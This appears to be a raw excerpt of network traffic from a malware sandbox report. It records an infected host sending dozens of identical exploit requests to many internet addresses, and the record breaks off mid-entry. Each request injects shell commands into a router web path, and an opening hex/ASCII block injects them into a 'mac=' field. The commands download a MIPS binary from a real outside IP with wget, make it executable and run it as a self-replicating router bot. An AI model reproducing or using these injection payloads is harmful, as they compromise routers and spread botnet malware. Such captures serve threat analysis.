                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6767192.168.2.2333582193.66.25.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953234911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6768192.168.2.2350630155.77.183.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953260899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6769192.168.2.233692868.47.60.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953301907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6770192.168.2.234520098.24.184.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953347921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6771192.168.2.2354858141.1.161.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953366041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6772192.168.2.2341768145.136.169.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953418970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6773192.168.2.233917262.101.40.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953429937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6774192.168.2.233404453.33.252.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953438997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6775192.168.2.233482296.88.166.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953468084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6776192.168.2.235665827.194.169.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953509092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6777192.168.2.233641272.122.39.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953538895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6778192.168.2.2344602162.67.195.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953555107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6779192.168.2.233339217.145.219.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953596115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6780192.168.2.2339228146.213.167.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953608990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6781192.168.2.2345810147.205.93.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953628063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6782192.168.2.2344588107.145.222.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953670025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6783192.168.2.2341004152.26.75.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953681946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6784192.168.2.2333056130.158.191.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953713894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6785192.168.2.2359784207.160.180.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953787088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6786192.168.2.236075285.188.176.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953787088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6787192.168.2.2356214189.171.122.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953794003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6788192.168.2.235348049.214.74.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953833103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6789192.168.2.2335680148.35.105.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953862906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6790192.168.2.2351666202.106.15.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953880072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6791192.168.2.233665625.137.50.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953927040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6792192.168.2.235027035.181.79.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953948021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6793192.168.2.233504070.190.164.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.953982115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6794192.168.2.2336894206.15.58.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954011917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6795192.168.2.235235867.226.98.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954065084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6796192.168.2.2339072194.178.186.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954072952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6797192.168.2.235134620.183.140.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954097986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6798192.168.2.2342068123.100.215.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954103947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6799192.168.2.2333600117.199.38.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954149008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6800192.168.2.2350872112.197.206.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954176903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6801192.168.2.2348908102.15.103.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954214096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6802192.168.2.234963676.231.14.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954231977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6803192.168.2.2358250115.36.126.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954262972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6804192.168.2.2357006170.76.22.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954284906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6805192.168.2.233396496.106.43.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954302073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6806192.168.2.2333262213.67.158.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954332113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6807192.168.2.2341162186.171.225.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954370975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6808192.168.2.23597424.125.172.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954399109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6809192.168.2.2337300114.99.131.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954430103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6810192.168.2.2353362146.90.145.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954472065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6811192.168.2.233623098.155.47.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954498053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6812192.168.2.235419837.96.82.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954516888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6813192.168.2.235200061.149.192.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954551935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6814192.168.2.2333700175.225.29.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954593897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6815192.168.2.2358580163.240.104.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954612970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6816192.168.2.236055891.237.185.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954647064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6817192.168.2.2360476170.155.54.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954670906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6818192.168.2.234552035.33.8.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954691887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6819192.168.2.2349168110.124.100.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954749107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6820192.168.2.234462466.59.65.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954776049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6821192.168.2.2340858143.216.157.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954786062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6822192.168.2.234480237.171.60.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954824924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6823192.168.2.23427862.36.194.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954854012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6824192.168.2.2341468208.155.170.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954876900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6825192.168.2.2335534119.197.233.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954895020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6826192.168.2.2348006208.97.14.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.954938889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6827192.168.2.2342044155.206.47.180443
                                                TimestampBytes transferredDirectionData
